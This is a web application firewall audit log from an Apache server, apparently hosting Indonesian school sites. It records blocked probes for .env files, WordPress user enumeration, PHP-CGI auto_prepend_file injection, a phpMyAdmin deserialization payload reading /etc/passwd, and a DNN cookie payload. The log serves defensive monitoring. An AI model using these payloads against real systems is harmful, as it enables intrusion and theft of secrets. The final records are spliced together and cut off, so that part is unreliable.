Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a74b6107-Z-- --47dc3a4e-A-- [20/May/2025:22:30:37 +0700] aCygHW2BM6ll8T8hTXvKAwAAAEU 103.236.140.4 41488 103.236.140.4 8181 --47dc3a4e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.24 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --47dc3a4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47dc3a4e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747755037896922 841 (- - -) Stopwatch2: 1747755037896922 841; combined=381, p1=345, p2=0, p3=0, p4=0, p5=36, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47dc3a4e-Z-- --501fa920-A-- [20/May/2025:22:57:23 +0700] aCymY4Kffmi-VC_l8kSIAwAAABc 103.236.140.4 50682 103.236.140.4 8181 --501fa920-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.167.200 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.167.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; BBB100-1 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36 Accept-Charset: utf-8 --501fa920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --501fa920-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747756643356976 800 (- - -) Stopwatch2: 1747756643356976 800; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --501fa920-Z-- --c588c716-A-- [20/May/2025:23:05:01 +0700] aCyoLcXP1sKBAOnOfYNx2QAAANc 103.236.140.4 34502 103.236.140.4 8181 --c588c716-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.205.46.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.205.46.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c588c716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c588c716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747757101649032 3906 (- - -) Stopwatch2: 1747757101649032 3906; combined=1885, p1=627, p2=1221, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c588c716-Z-- --b622b053-A-- [20/May/2025:23:08:37 +0700] aCypBW2BM6ll8T8hTXvdjwAAAE8 103.236.140.4 35628 103.236.140.4 8181 --b622b053-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 218.250.231.191 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 218.250.231.191 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b622b053-C-- --b622b053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b622b053-E-- --b622b053-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747757317401933 4557 (- - -) Stopwatch2: 1747757317401933 4557; combined=3332, p1=540, p2=2751, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b622b053-Z-- --6aec1863-A-- [20/May/2025:23:15:31 +0700] aCyqo22BM6ll8T8hTXvhkAAAAFQ 103.236.140.4 42140 103.236.140.4 8181 --6aec1863-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.183.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.183.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6aec1863-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aec1863-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747757731728428 2828 (- - -) Stopwatch2: 1747757731728428 2828; combined=1288, p1=411, p2=839, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aec1863-Z-- --77d2371d-A-- [20/May/2025:23:16:23 +0700] aCyq122BM6ll8T8hTXviKQAAAEQ 103.236.140.4 43158 103.236.140.4 8181 --77d2371d-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --77d2371d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77d2371d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747757783845244 10270 (- - -) Stopwatch2: 1747757783845244 10270; combined=19113, p1=355, p2=0, p3=0, p4=0, p5=9397, sr=122, sw=0, l=0, gc=9361 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77d2371d-Z-- --9d09aa53-A-- [20/May/2025:23:51:07 +0700] aCyy-8XP1sKBAOnOfYNzSQAAANc 103.236.140.4 44378 103.236.140.4 8181 --9d09aa53-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.229.96.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.229.96.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d09aa53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d09aa53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747759867988812 3215 (- - -) Stopwatch2: 1747759867988812 3215; combined=1336, p1=463, p2=841, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d09aa53-Z-- --4c8fc53d-A-- [20/May/2025:23:54:28 +0700] aCyzxG2BM6ll8T8hTXvi8gAAAFE 103.236.140.4 44418 103.236.140.4 8181 --4c8fc53d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.74.19.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.74.19.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4c8fc53d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8fc53d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747760068092622 3187 (- - -) Stopwatch2: 1747760068092622 3187; combined=1464, p1=508, p2=923, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8fc53d-Z-- --17ed1117-A-- [20/May/2025:23:57:51 +0700] aCy0j8XP1sKBAOnOfYNzUQAAAMM 103.236.140.4 44426 103.236.140.4 8181 --17ed1117-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.220.100.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.100.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --17ed1117-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17ed1117-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747760271917155 3437 (- - -) Stopwatch2: 1747760271917155 3437; combined=1479, p1=471, p2=978, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17ed1117-Z-- --31adc10b-A-- [21/May/2025:00:44:47 +0700] aCy_j22BM6ll8T8hTXvjEAAAAEI 103.236.140.4 44626 103.236.140.4 8181 --31adc10b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.10.156.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.10.156.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --31adc10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31adc10b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747763087533712 2913 (- - -) Stopwatch2: 1747763087533712 2913; combined=1227, p1=412, p2=786, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31adc10b-Z-- --c3dc7d01-A-- [21/May/2025:00:48:50 +0700] aCzAgsXP1sKBAOnOfYNzZQAAANQ 103.236.140.4 44652 103.236.140.4 8181 --c3dc7d01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.36.22.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.36.22.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3dc7d01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3dc7d01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747763330101965 2685 (- - -) Stopwatch2: 1747763330101965 2685; combined=1127, p1=386, p2=714, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3dc7d01-Z-- --ecacb539-A-- [21/May/2025:01:24:03 +0700] aCzIw4Kffmi-VC_l8kSNVgAAAAQ 103.236.140.4 49280 103.236.140.4 8181 --ecacb539-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ecacb539-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecacb539-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747765443483839 815 (- - -) Stopwatch2: 1747765443483839 815; combined=320, p1=282, p2=0, p3=0, p4=0, p5=37, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecacb539-Z-- --4f570e3f-A-- [21/May/2025:01:57:43 +0700] aCzQp4Kffmi-VC_l8kSNagAAAAU 103.236.140.4 49402 103.236.140.4 8181 --4f570e3f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 50.7.40.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 50.7.40.241 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --4f570e3f-C-- --4f570e3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f570e3f-E-- --4f570e3f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747767463919188 5136 (- - -) Stopwatch2: 1747767463919188 5136; combined=3271, p1=492, p2=2741, p3=0, p4=0, p5=38, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f570e3f-Z-- --6e187433-A-- [21/May/2025:02:08:59 +0700] aCzTS22BM6ll8T8hTXvlrgAAAFc 103.236.140.4 49620 103.236.140.4 8181 --6e187433-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.210.234.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.210.234.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6e187433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e187433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747768139151953 3261 (- - -) Stopwatch2: 1747768139151953 3261; combined=1384, p1=483, p2=871, p3=0, p4=0, p5=30, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e187433-Z-- --2e64721f-A-- [21/May/2025:02:17:24 +0700] aCzVRPjdRvl4szSJA_bFvQAAAIQ 103.236.140.4 49676 103.236.140.4 8181 --2e64721f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 3.6.41.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 3.6.41.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e64721f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e64721f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747768644409746 3182 (- - -) Stopwatch2: 1747768644409746 3182; combined=1420, p1=546, p2=843, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e64721f-Z-- --eaaba932-A-- [21/May/2025:02:50:45 +0700] aCzdFfjdRvl4szSJA_bFxwAAAIs 103.236.140.4 49850 103.236.140.4 8181 --eaaba932-B-- POST /scripts/setup.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 80 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 168161607 --eaaba932-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --eaaba932-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaaba932-E-- --eaaba932-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747770645130437 2645 (- - -) Stopwatch2: 1747770645130437 2645; combined=755, p1=523, p2=184, p3=0, p4=0, p5=48, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaaba932-Z-- --1926ef75-A-- [21/May/2025:02:50:45 +0700] aCzdFW2BM6ll8T8hTXvlxwAAAFQ 103.236.140.4 49838 103.236.140.4 8181 --1926ef75-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 160557772 --1926ef75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1926ef75-E-- --1926ef75-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 157997070 --6a438731-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a438731-E-- --6a438731-H-- Message: Access denied with code 403 (phase 2). Pattern match " --f6f8f528-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6f8f528-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg 